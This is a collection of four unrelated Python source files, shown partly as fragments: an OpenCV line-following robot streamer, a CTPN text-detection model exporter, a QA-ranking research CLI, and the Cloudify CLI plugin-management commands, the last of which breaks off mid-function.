print("Streaming video now...")
print("Press 'q' to exit!")
# need bytes here
stream_bytes = b' '
while True:
stream_bytes += self.connectionBuff.read(1024)
first = stream_bytes.find(b'\xff\xd8')
last = stream_bytes.find(b'\xff\xd9')
if first != -1 and last != -1:
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
image = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
cv2.imshow('Video', image)
roi = image[120:240, 0:320]
grey_img = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(grey_img, (5, 5), 0)
ret, thresh = cv2.threshold(blur, 60, 255, cv2.THRESH_BINARY_INV)
imgErosion = cv2.erode(thresh, None, iterations=2)
imgDilation = cv2.dilate(imgErosion, None, iterations=2)
contours, hierarchy = cv2.findContours(imgDilation.copy(), 1, cv2.CHAIN_APPROX_NONE)
if len(contours) > 0:
try:
c = max(contours, key=cv2.contourArea)
M = cv2.moments(c)
cx = int(M['m10'] / M['m00'])
cy = int(M['m01'] / M['m00'])
cv2.line(roi, (cx, 0), (cx, 720), (255, 0, 0), 1)
cv2.line(roi, (0, cy), (1280, cy), (255, 0, 0), 1)
cv2.drawContours(roi, contours, -1, (0, 255, 0), 1)
self.robot(cx)
except Exception as e:
print(f'Moments error: {e}')
else:
print("Can't see nothing!")
cv2.imshow('Frame', roi)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
finally:
self.connection.close()
self.serverSocket.close()
def robot(self, cx):
centroidx = cx
if centroidx >= 220:
self.connection.send(bytes("3", 'utf-8'))
print("3 - Right")
elif centroidx < 220 and cx > 100:
self.connection.send(bytes("1", "utf-8"))
print("1 - Forward")
elif centroidx <= 100:
self.connection.send(bytes("2", "utf-8"))
print("2 - Left")
else:
print("Error in Calculation!")
if __name__ == '__main__':
# host, port of the Local machine
h, p = "192.168.1.67", 8000
videoStreaming(h, p)
|
<reponame>kspook/text-detection-ctpn01
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os, sys, cv2
from tensorflow.python.platform import gfile
import glob
import shutil
dir_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(dir_path, '..'))
from lib.networks.factory import get_network
from lib.fast_rcnn.config import cfg, cfg_from_file
from lib.fast_rcnn.test import test_ctpn
from lib.utils.timer import Timer
from lib.text_connector.detectors import TextDetector
from lib.text_connector.text_connect_cfg import Config as TextLineCfg
from lib.fast_rcnn.test import _get_blobs
from lib.rpn_msr.proposal_layer_tf import proposal_layer
dir_path = os.path.dirname(os.path.realpath(__file__))
def resize_im(im, scale, max_scale=None):
f = float(scale) / min(im.shape[0], im.shape[1])
if max_scale != None and f * max(im.shape[0], im.shape[1]) > max_scale:
f = float(max_scale) / max(im.shape[0], im.shape[1])
return cv2.resize(im, None, None, fx=f, fy=f, interpolation=cv2.INTER_LINEAR), f
def preprocess_image(image_buffer):
"""Preprocess JPEG encoded bytes to 3D float Tensor."""
# Decode the string as an RGB JPEG.
# Note that the resulting image contains an unknown height and width
# that is set dynamically by decode_jpeg. In other words, the height
# and width of image is unknown at compile-time.
image = tf.image.decode_image(image_buffer, channels=3)
image.set_shape([256, 256, 256,3])
# self.img_pl = tf.placeholder(tf.string, name='input_image_as_bytes')
# After this point, all image pixels reside in [0,1)
# until the very end, when they're rescaled to (-1, 1). The various
# adjust_* ops all require this range for dtype float.
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Crop the central region of the image with an area containing 87.5% of
# the original image.
image = tf.image.central_crop(image, central_fraction=0.875)
image = tf.expand_dims(image, 0)
image = tf.squeeze(image, [0])
# Finally, rescale to [-1,1] instead of [0, 1)
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image
def query_ctpn(sess, cv2img):
"""Args:
sess: tensorflow session
cfg: CTPN config
img: numpy array image
Returns:
A list of detected bounding boxes,
each bounding box have followed coordinates: [(xmin, ymin), (xmax, ymax)]
(xmin, ymin) -------------
| |
---------------- (xmax, ymax)
"""
# Specify input/output
input_img = sess.graph.get_tensor_by_name('Placeholder:0')
output_cls_box = sess.graph.get_tensor_by_name('Reshape_2:0')
output_box_pred = sess.graph.get_tensor_by_name('rpn_bbox_pred/Reshape_1:0')
#print('query_pb : img, ', img)
img, scale = resize_im(cv2img, scale=TextLineCfg.SCALE, max_scale=TextLineCfg.MAX_SCALE)
blobs, im_scales = _get_blobs(img, None)
if cfg.TEST.HAS_RPN:
im_blob = blobs['data']
blobs['im_info'] = np.array([[im_blob.shape[1], im_blob.shape[2], im_scales[0]]],
dtype=np.float32)
cls_prob, box_pred = sess.run([output_cls_box, output_box_pred],
feed_dict={input_img: blobs['data']})
#print('cls_prob, ', cls_prob, box_pred )
print('box_pred, ', box_pred )
rois, _ = proposal_layer(cls_prob, box_pred, blobs['im_info'],
'TEST', anchor_scales=cfg.ANCHOR_SCALES)
print('rois, ', rois)
scores = rois[:, 0]
#print('scores, ', scores )
boxes = rois[:, 1:5] / im_scales[0]
#print('boxes=rois, ', boxes )
textdetector = TextDetector()
print('textDetector, ', textdetector )
boxes = textdetector.detect(boxes, scores[:, np.newaxis], img.shape[:2])
print('boxes=textdetector, ', boxes )
# Convert boxes to bouding rectangles
rects = []
for box in boxes:
min_x = min(int(box[0]/scale), int(box[2]/scale), int(box[4]/scale), int(box[6]/scale))
min_y = min(int(box[1]/scale), int(box[3]/scale), int(box[5]/scale), int(box[7]/scale))
max_x = max(int(box[0]/scale), int(box[2]/scale), int(box[4]/scale), int(box[6]/scale))
max_y = max(int(box[1]/scale), int(box[3]/scale), int(box[5]/scale), int(box[7]/scale))
rects.append([(min_x, min_y), (max_x, max_y)])
print('rects.append, ', rects)
return rects
def export():
'''
No 1 Sess outf of 2 : ctpn_sess
'''
cfg_from_file(os.path.join(dir_path, 'text_post.yml'))
config = tf.ConfigProto(allow_soft_placement=True)
ctpn_sess = tf.Session(config=config)
with ctpn_sess.as_default():
with tf.gfile.FastGFile('../data/ctpn.pb', 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
ctpn_sess.graph.as_default()
tf.import_graph_def(graph_def, name='')
ctpn_sess.run(tf.global_variables_initializer())
cv2img = cv2.imread("../data/demo/006.jpg", cv2.IMREAD_COLOR)
result_boxes=query_ctpn(ctpn_sess, cv2img)
print('Creating boxes done')
'''
No 2 Sess outf of 2:sess
'''
with tf.Session() as sess:
with gfile.FastGFile('../data/ctpn.pb', 'rb') as f:
restored_graph_def = tf.GraphDef()
restored_graph_def.ParseFromString(f.read())
tf.import_graph_def(
restored_graph_def,
input_map=None,
return_elements=None,
name=""
)
'''
export_path_base = args.export_model_dir
export_path = os.path.join(tf.compat.as_bytes(export_path_base),
tf.compat.as_bytes(str(args.model_version)))
'''
builder = tf.saved_model.builder.SavedModelBuilder('../exportPo/1')
#print('Exporting trained model to', export_path)
print('Exporting trained model ')
raw_image = tf.placeholder(tf.string, name='tf_box')
feature_configs = {
'image/encoded': tf.FixedLenFeature(
shape=[], dtype=tf.string),
}
tf_example = tf.parse_example(raw_image , feature_configs)
jpegs = tf_example['image/encoded']
image_string = tf.reshape(jpegs, shape=[])
jpeg= preprocess_image(image_string)
print('jpeg,jpeg.shape[]', jpeg, jpeg.shape)
output_tensor_cls_prob,output_tensor_box_pred = tf.import_graph_def\
(tf.get_default_graph().as_graph_def(),
input_map={'Placeholder:0': jpeg},
return_elements=['Reshape_2:0','rpn_bbox_pred/Reshape_1:0'])
tensor_info_input = tf.saved_model.utils.build_tensor_info(raw_image)
tensor_info_output_cls_prob = tf.saved_model.utils.build_tensor_info(output_tensor_cls_prob)
tensor_info_output_box_pred = tf.saved_model.utils.build_tensor_info(output_tensor_box_pred)
'''
#crop_resize_img,crop_resize_im_info = resize_im(cv2img, result_boxes)
#crop_resize_img,crop_resize_im_info = crop_resize_image(imageplaceholder_info, result_boxes)
# output_crop_resize_img = tf.saved_model.utils.build_tensor_info(crop_resize_img)
#output_crop_resize_img_info = tf.saved_model.utils.build_tensor_info(crop_resize_im_info)
#----------
'''
result_boxes= np.array(result_boxes, dtype=np.float32)
result_boxes= tf.convert_to_tensor(result_boxes)
tensor_info_output_boxes = tf.saved_model.utils.build_tensor_info(result_boxes)
prediction_post_signature = (
tf.saved_model.signature_def_utils.build_signature_def(
inputs={'images': tensor_info_input},
outputs={'detection_boxes': tensor_info_output_boxes},
#outputs={'detection_boxes': tensor_info_output_boxes,
# 'resize_im_info':im_info_output,
# 'crop_resize_img': output_crop_resize_img,
# 'crop_resize_im_info': output_crop_resize_img_info,},
method_name=tf.saved_model.signature_constants.PREDICT_METHOD_NAME
))
builder.add_meta_graph_and_variables(
sess, [tf.saved_model.tag_constants.SERVING],
signature_def_map={
# 'predict_images':prediction_signature,
'predict_images_post': prediction_post_signature
})
builder.save(as_text=False)
if __name__ == '__main__':
export()
|
<gh_stars>1-10
import logging
from zensols.actioncli import OneConfPerActionOptionsCliEnv
import zensols.dlqaclass.lsa
from zensols.dlqaclass import (
AppConfig,
QADataLoader,
QAModelManager,
Ranker,
)
class CorpusExec(object):
def __init__(self, config):
self.config = config
self.dl = QADataLoader(self.config)
import random
random.seed(0)
def reparse_corpus(self):
self.dl.reparse(force=True, n_workers=10)
def write_features(self):
self.dl.write_features(force=True, n_workers=20)
class ModelExec(object):
def __init__(self, config):
self.docmng = QAModelManager(config)
def train(self):
self.docmng.train()
def test(self):
self.docmng.test(self.docmng.load_model())
def train_test(self):
self.train()
self.test()
class RankExec(object):
def __init__(self, config):
self.ranker = Ranker(config)
def compute_ranks(self):
self.ranker.compute_ranks()
def calculate_mrr(self):
self.ranker.write_mrr()
class LsaExec(object):
def __init__(self, config):
self.mmng = zensols.dlqaclass.lsa.DocModelManager(config)
def calculate_mrr(self):
self.mmng.model
self.mmng.write_mrr()
class ConfAppCommandLine(OneConfPerActionOptionsCliEnv):
def __init__(self):
cnf = {'executors':
[{'name': 'exporter',
'executor': lambda params: CorpusExec(**params),
'actions': [{'name': 'parse',
'meth': 'reparse_corpus',
'doc': '(re)parse the corpus'},
{'name': 'features',
'meth': 'write_features',
'doc': 'write generated features to disk'}]},
{'name': 'model',
'executor': lambda params: ModelExec(**params),
'actions': [{'name': 'train',
'doc': 'train the model'},
{'name': 'test',
'doc': 'test the model'},
{'name': 'traintest',
'meth': 'train_test',
'doc': 'train and test the model'}]},
{'name': 'rank',
'executor': lambda params: RankExec(**params),
'actions': [{'name': 'calcrank',
'meth': 'compute_ranks',
'doc': 'rank all questions across all paragraphs'},
{'name': 'calcmrr',
'meth': 'calculate_mrr',
'doc': 'calculate the MRR based on computed ranks'}]},
{'name': 'lsa',
'executor': lambda params: LsaExec(**params),
'actions': [{'name': 'lsammr',
'meth': 'calculate_mrr',
'doc': 'calculate the baseline LSA MRR'}]}],
'config_option': {'name': 'config',
'expect': True,
'opt': ['-c', '--config', False,
{'dest': 'config',
'metavar': 'FILE',
'help': 'configuration file'}]},
'whine': 1}
super(ConfAppCommandLine, self).__init__(
cnf, config_env_name='dlqarc', pkg_dist='zensols.dlqaclass',
no_os_environ=True, config_type=AppConfig)
def _config_logging(self, level):
root = logging.getLogger()
map(root.removeHandler, root.handlers[:])
if level == 0:
levelno = logging.WARNING
elif level == 1:
levelno = logging.INFO
elif level == 2:
levelno = logging.DEBUG
fmt = '%(levelname)s:%(asctime)-15s %(name)s: %(message)s'
logging.basicConfig(format=fmt, level=levelno)
root.setLevel(levelno)
logging.getLogger('zensols.actioncli').setLevel(level=logging.WARNING)
def main():
cl = ConfAppCommandLine()
cl.invoke()
|
<reponame>Ilanad/cloudify-cli
########
# Copyright (c) 2018 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
import os
import time
import click
import wagon
from cloudify.models_states import PluginInstallationState
from cloudify_cli import execution_events_fetcher
from cloudify_cli.logger import get_events_logger
from cloudify_cli.exceptions import (
SuppressedCloudifyCliError, CloudifyCliError, CloudifyValidationError,
)
from cloudify_rest_client.constants import VISIBILITY_EXCEPT_PRIVATE
from cloudify_rest_client.exceptions import CloudifyClientError
from .. import utils
from ..logger import get_global_json_output
from ..table import print_data, print_single, print_details
from ..cli import helptexts, cfy
from ..utils import (prettify_client_error,
get_visibility,
validate_visibility)
PLUGIN_COLUMNS = ['id', 'package_name', 'package_version', 'installed on',
'distribution', 'distribution_release', 'uploaded_at',
'visibility', 'tenant_name', 'created_by',
'yaml_url_path']
PLUGINS_UPDATE_COLUMNS = ['id', 'state', 'blueprint_id', 'temp_blueprint_id',
'execution_id', 'deployments_to_update',
'visibility', 'created_at', 'forced']
GET_DATA_COLUMNS = ['file_server_path', 'supported_platform',
'supported_py_versions']
@cfy.group(name='plugins')
@cfy.options.common_options
def plugins():
"""Handle plugins on the manager
"""
pass
@plugins.command(name='validate',
short_help='Validate a plugin')
@cfy.argument('plugin-path')
@cfy.options.common_options
@cfy.pass_logger
def validate(plugin_path, logger):
"""Validate a plugin
This will try to validate the plugin's archive is not corrupted.
A valid plugin is a wagon (http://github.com/cloudify-cosomo/wagon)
in the tar.gz format.
`PLUGIN_PATH` is the path to wagon archive to validate.
"""
logger.info('Validating plugin {0}...'.format(plugin_path))
wagon.validate(plugin_path)
logger.info('Plugin validated successfully')
@plugins.command(name='delete',
short_help='Delete a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.force(help=helptexts.FORCE_DELETE_PLUGIN)
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def delete(plugin_id, force, logger, client, tenant_name):
"""Delete a plugin from the manager
`PLUGIN_ID` is the id of the plugin to delete.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Deleting plugin {0}...'.format(plugin_id))
client.plugins.delete(plugin_id=plugin_id, force=force)
logger.info('Plugin deleted')
@plugins.command(name='upload',
short_help='Upload a plugin [manager only]')
@cfy.argument('plugin-path')
@cfy.options.plugin_yaml_path()
@cfy.options.plugin_icon_path()
@cfy.options.plugin_title()
@cfy.options.private_resource
@cfy.options.visibility()
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_context
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def upload(ctx,
plugin_path,
yaml_path,
icon_path,
title,
private_resource,
visibility,
logger,
client,
tenant_name):
"""Upload a plugin to the manager
`PLUGIN_PATH` is the path to wagon archive to upload.
"""
client.license.check()
# Test whether the path is a valid URL. If it is, no point in doing local
# validations - it will be validated on the server side anyway
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Creating plugin zip archive..')
wagon_path = utils.get_local_path(plugin_path, create_temp=True)
yaml_path = utils.get_local_path(yaml_path, create_temp=True)
zip_files = [wagon_path, yaml_path]
zip_descr = 'wagon + yaml'
if icon_path:
icon_path = utils.get_local_path(icon_path,
destination='icon.png',
create_temp=True)
zip_files.append(icon_path)
zip_descr += ' + icon'
zip_path = utils.zip_files(zip_files)
progress_handler = utils.generate_progress_handler(zip_path, '')
visibility = get_visibility(private_resource, visibility, logger)
logger.info('Uploading plugin archive (%s)..', zip_descr)
try:
plugin = client.plugins.upload(zip_path,
plugin_title=title,
visibility=visibility,
progress_callback=progress_handler)
logger.info("Plugin uploaded. Plugin's id is {0}".format(plugin.id))
finally:
for f in zip_files:
os.remove(f)
os.remove(zip_path)
@plugins.command(name='bundle-upload',
short_help='Upload a bundle of plugins [manager only]')
@cfy.options.plugins_bundle_path
@cfy.pass_client()
@cfy.pass_logger
def upload_caravan(client, logger, path):
client.license.check()
if not path:
logger.info("Starting upload of plugins bundle, "
"this may take few minutes to complete.")
path = 'http://repository.cloudifysource.org/' \
'cloudify/wagons/cloudify-plugins-bundle.tgz'
progress = utils.generate_progress_handler(path, '')
plugins_ = client.plugins.upload(path, progress_callback=progress)
logger.info("Bundle uploaded, {0} Plugins installed."
.format(len(plugins_)))
if len(plugins_) > 0:
logger.info("The plugins' ids are:\n{0}\n".
format('\n'.join([p.id for p in plugins_])))
@plugins.command(name='download',
short_help='Download a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.output_path
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_logger
@cfy.pass_client()
def download(plugin_id, output_path, logger, client, tenant_name):
"""Download a plugin from the manager
`PLUGIN_ID` is the id of the plugin to download.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Downloading plugin {0}...'.format(plugin_id))
plugin_name = output_path if output_path else plugin_id
progress_handler = utils.generate_progress_handler(plugin_name, '')
target_file = client.plugins.download(plugin_id,
output_path,
progress_handler)
logger.info('Plugin downloaded as {0}'.format(target_file))
def _format_installation_state(plugin):
"""Format the 'installation_state' into a human-readable 'installed on'"""
if not plugin.get('installation_state'):
return ''
agents = 0
managers = 0
errors = 0
for state in plugin['installation_state']:
if state['state'] == PluginInstallationState.ERROR:
errors += 1
elif state['state'] != PluginInstallationState.INSTALLED:
continue
if state.get('manager'):
managers += 1
elif state.get('agent'):
agents += 1
parts = []
if managers:
parts.append('{0} managers'.format(managers))
if agents:
parts.append('{0} agents'.format(agents))
if errors:
parts.append('{0} errors'.format(errors))
return ', '.join(parts)
@plugins.command(name='get',
short_help='Retrieve plugin information [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def get(plugin_id, logger, client, tenant_name, get_data):
"""Retrieve information for a specific plugin
`PLUGIN_ID` is the id of the plugin to get information on.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugin {0}...'.format(plugin_id))
plugin = client.plugins.get(plugin_id, _get_data=get_data)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
plugin['installed on'] = _format_installation_state(plugin)
if get_global_json_output():
# for json, also include installation_state because it's useful
print_single(columns + ['installation_state'], plugin, 'Plugin:', 50)
return
states = {}
for state in plugin.pop('installation_state', []):
if state.get('manager'):
label = 'Manager {0}'.format(state['manager'])
elif state.get('agent'):
label = 'Agent {0}'.format(state['agent'])
states[label] = state['state']
print_details({
col: plugin.get(col) for col in columns
}, 'Plugin:')
print_details(states, 'Plugin installation state:')
@plugins.command(name='list',
short_help='List plugins [manager only]')
@cfy.options.sort_by('uploaded_at')
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugin')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def list(sort_by,
descending,
tenant_name,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
get_data):
"""List all plugins on the manager
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Listing all plugins...')
plugins_list = client.plugins.list(sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_get_data=get_data,
_offset=pagination_offset,
_size=pagination_size)
for plugin in plugins_list:
plugin['installed on'] = _format_installation_state(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
if get_global_json_output():
columns += ['installation_state']
print_data(columns, plugins_list, 'Plugins:')
total = plugins_list.metadata.pagination.total
logger.info('Showing {0} of {1} plugins'.format(len(plugins_list),
total))
def _wait_for_plugin_to_be_installed(client, plugin_id, managers, agents,
timeout, logger):
logger.info(
'Waiting for plugin %s to be installed on the managers: [%s] '
'and agents: [%s]',
plugin_id, ', '.join(managers), ', '.join(agents)
)
wait_managers = set(managers)
wait_agents = set(agents)
errors = 0
deadline = time.time() + timeout
while time.time() < deadline:
for pstate in client.plugins.get(plugin_id)['installation_state']:
if pstate['state'] == PluginInstallationState.INSTALLED:
if pstate.get('manager') in wait_managers:
wait_managers.remove(pstate['manager'])
logger.info('Finished installing on manager %s',
pstate['manager'])
if pstate.get('agent') in wait_agents:
wait_agents.remove(pstate['agent'])
logger.info('Finished installing on agent %s',
pstate['agent'])
if pstate['state'] == PluginInstallationState.ERROR:
if pstate.get('manager') in wait_managers:
errors += 1
wait_managers.remove(pstate['manager'])
logger.info('Error installing on manager %s: %s',
pstate['manager'], pstate['error'])
if pstate.get('agent') in wait_agents:
errors += 1
wait_agents.remove(pstate['agent'])
logger.info('Error installing on agent %s: %s',
pstate['agent'], pstate['error'])
if not wait_managers and not wait_agents:
break
time.sleep(1)
else:
raise CloudifyCliError(
'Timed out waiting for plugin {0} to be installed on managers: '
'[{1}] and agents: [{2}]'
.format(plugin_id,
', '.join(managers),
', '.join(agents))
)
if errors:
raise CloudifyCliError('Encountered errors while installing plugins')
@plugins.command(name='install',
short_help='Install a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@click.option('--manager-hostname', multiple=True,
help='The hostname of the manager to install the plugin on '
'(can be passed multiple times)')
@click.option('--agent-name', multiple=True,
help='The name of the agent to install the plugin on'
'(can be passed multiple times)')
@cfy.options.timeout(300)
@cfy.pass_client()
@cfy.pass_logger
def install(plugin_id, manager_hostname, agent_name, timeout, client, logger):
"""Install the plugin on the given managers and agents.
Force plugin installation before it needs to be used.
If manager hostnames and agent names are not provided, default to
installing on all managers.
This will wait for the plugins to be installed, up to timeout seconds.
"""
if not manager_hostname and not agent_name:
manager_hostname = [
manager.hostname for manager in client.manager.get_managers()
]
client.plugins.install(
plugin_id,
agents=agent_name,
managers=manager_hostname
)
_wait_for_plugin_to_be_installed(
client, plugin_id, manager_hostname, agent_name, timeout, logger)
@plugins.command(name='set-global',
short_help="Set the plugin's visibility to global")
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_global(plugin_id, logger, client):
"""Set the plugin's visibility to global
`PLUGIN_ID` is the id of the plugin to set global
"""
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_global(plugin_id)
logger.info('Plugin `{0}` was set to global'.format(plugin_id))
logger.info("This command will be deprecated soon, please use the "
"'set-visibility' command instead")
@plugins.command(name='set-visibility',
short_help="Set the plugin's visibility")
@cfy.argument('plugin-id')
@cfy.options.visibility(required=True, valid_values=VISIBILITY_EXCEPT_PRIVATE)
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_visibility(plugin_id, visibility, logger, client):
"""Set the plugin's visibility
`PLUGIN_ID` is the id of the plugin to update
"""
validate_visibility(visibility, valid_values=VISIBILITY_EXCEPT_PRIVATE)
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_visibility(plugin_id, visibility)
logger.info('Plugin `{0}` was set to {1}'.format(plugin_id,
visibility))
@plugins.command(name='update',
short_help='Update the plugins of all the deployments of '
'the blueprint [manager only]')
@cfy.argument('blueprint-id', required=False)
@cfy.options.all_blueprints
@cfy.options.all_tenants
@cfy.options.except_blueprints
@cfy.options.plugin_names
@cfy.options.plugins_to_latest
@cfy.options.plugins_all_to_latest
@cfy.options.plugins_to_minor
@cfy.options.plugins_all_to_minor
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
mutually_exclusive_with=['all_tenants'],
resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.options.include_logs
@cfy.options.json_output
@cfy.pass_logger
@cfy.pass_client()
@cfy.options.force(help=helptexts.FORCE_PLUGINS_UPDATE)
@cfy.options.auto_correct_types
@cfy.options.reevaluate_active_statuses(help=helptexts.
REEVALUATE_ACTIVE_STATUSES_PLUGINS)
def update(blueprint_id,
all_blueprints,
all_tenants,
except_blueprints,
plugin_names,
to_latest,
all_to_latest,
to_minor,
all_to_minor,
include_logs,
json_output,
logger,
client,
tenant_name,
force,
auto_correct_types,
reevaluate_active_statuses):
"""Update the plugins of all the deployments of the given blueprint
or any blueprint in case `--all-blueprints` flag was used instead of
providing a BLUEPRINT_ID. This will update the deployments one by one
until all succeeded.
"""
# Validate input arguments
if ((blueprint_id and all_blueprints) or
(not blueprint_id and not all_blueprints)):
raise CloudifyValidationError(
'ERROR: Invalid command syntax. Either provide '
'a BLUEPRINT_ID or use --all-blueprints flag.')
if except_blueprints and not all_blueprints:
raise CloudifyValidationError(
'ERROR: Invalid command syntax. Cannot list blueprints '
'exceptions unless used with --all-blueprints flag.')
all_to_minor = bool(all_to_minor)
if all_to_latest is None:
all_to_latest = not all_to_minor
if (all_to_latest and all_to_minor) or \
(not all_to_latest and not all_to_minor):
raise CloudifyValidationError(
'ERROR: Invalid command syntax. --all-to-latest and '
'--all-to-minor are mutually exclusive.')
if to_latest and all_to_latest:
raise CloudifyValidationError(
'ERROR: Invalid command syntax. --all-to-latest and '
'--to-latest are mutually exclusive. If you want to upgrade '
'only the specific plugins, use --plugin-name parameter instead.')
if to_minor and all_to_minor:
raise CloudifyValidationError(
'ERROR: Invalid command syntax. --all-to-minor and '
'--to-minor are mutually exclusive. If you want to upgrade '
'only the specific plugins, use --plugin-name parameter instead.')
utils.explicit_tenant_name_message(tenant_name, logger)
if blueprint_id:
_update_a_blueprint(blueprint_id, plugin_names,
to_latest, all_to_latest, to_minor, all_to_minor,
include_logs, json_output, logger,
client, force, auto_correct_types,
reevaluate_active_statuses)
elif all_blueprints:
update_results = {'successful': [], 'failed': []}
pagination_offset = 0
while True:
blueprints = client.blueprints.list(
sort='created_at',
_all_tenants=all_tenants,
_offset=pagination_offset,
)
for blueprint in blueprints:
if blueprint.id in except_blueprints:
continue
try:
_update_a_blueprint(blueprint.id, plugin_names,
to_latest, all_to_latest,
to_minor, all_to_minor,
include_logs, json_output, logger,
client, force, auto_correct_types,
reevaluate_active_statuses)
update_results['successful'].append(blueprint.id)
except CloudifyClientError as ex:
update_results['failed'].append(blueprint.id)
logger.warning('Error during %s blueprint update. %s',
blueprint.id, ex)
pagination_offset += blueprints.metadata.pagination.size
if len(blueprints) < blueprints.metadata.pagination.size or \
0 == blueprints.metadata.pagination.size:
break
if update_results['successful']:
logger.info('Successfully updated %d blueprints.',
len(update_results['successful']))
if update_results['failed']:
logger.error('Failed updating %d blueprints.',
len(update_results['failed']))
logger.error('Failed blueprints: %s.',
', '.join(update_results['failed']))
def _update_a_blueprint(blueprint_id,
plugin_names,
to_latest,
all_to_latest,
to_minor,
all_to_minor,
include_logs,
json_output,
logger,
client,
force,
auto_correct_types,
reevaluate_active_statuses):
logger.info('Updating the plugins of the deployments of the blueprint '
'{}'.format(blueprint_id))
plugins_update = client.plugins_update.update_plugins(
blueprint_id, force=force, plugin_names=plugin_names,
to_latest=to_latest, all_to_latest=all_to_latest,
to_minor=to_minor, all_to_minor=all_to_minor,
auto_correct_types=auto_correct_types,
reevaluate_active_statuses=reevaluate_active_statuses,
)
events_logger = get_events_logger(json_output)
execution = execution_events_fetcher.wait_for_execution(
client,
client.executions.get(plugins_update.execution_id),
events_handler=events_logger,
include_logs=include_logs,
timeout=None # don't timeout ever
)
if execution.error:
logger.info("Execution of workflow '{0}' for blueprint "
"'{1}' failed. [error={2}]"
.format(execution.workflow_id,
blueprint_id,
execution.error))
logger.info('Failed updating plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
raise SuppressedCloudifyCliError()
logger.info("Finished executing workflow '{0}'".format(
execution.workflow_id))
logger.info('Successfully updated plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
@plugins.command(
name='get-update',
short_help='Retrieve plugins update information [manager only]'
)
@cfy.argument('plugins-update-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
resource_name_for_help='plugins update')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_get_update(plugins_update_id, logger, client, tenant_name):
"""Retrieve information for a specific plugins update
`PLUGINS_UPDATE_ID` is the id of the plugins update to get information on.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugins update {0}...'.format(plugins_update_id))
plugins_update_dict = client.plugins_update.get(plugins_update_id)
print_single(
PLUGINS_UPDATE_COLUMNS, plugins_update_dict, 'Plugins update:')
@plugins.command(name='history', short_help='List plugins updates '
'[manager only]')
@cfy.options.blueprint_id()
@cfy.options.sort_by()
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugins update')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_history(blueprint_id,
sort_by,
descending,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
tenant_name):
"""Show blueprint history by listing plugins updates
If `--blueprint-id` is provided, list plugins updates for that
blueprint. Otherwise, list plugins updates for all blueprints.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
if blueprint_id:
logger.info('Listing plugins updates for blueprint {0}...'.format(
blueprint_id))
else:
logger.info('Listing all plugins updates...')
plugins_updates = client.plugins_update.list(
sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_offset=pagination_offset,
_size=pagination_size,
blueprint_id=blueprint_id
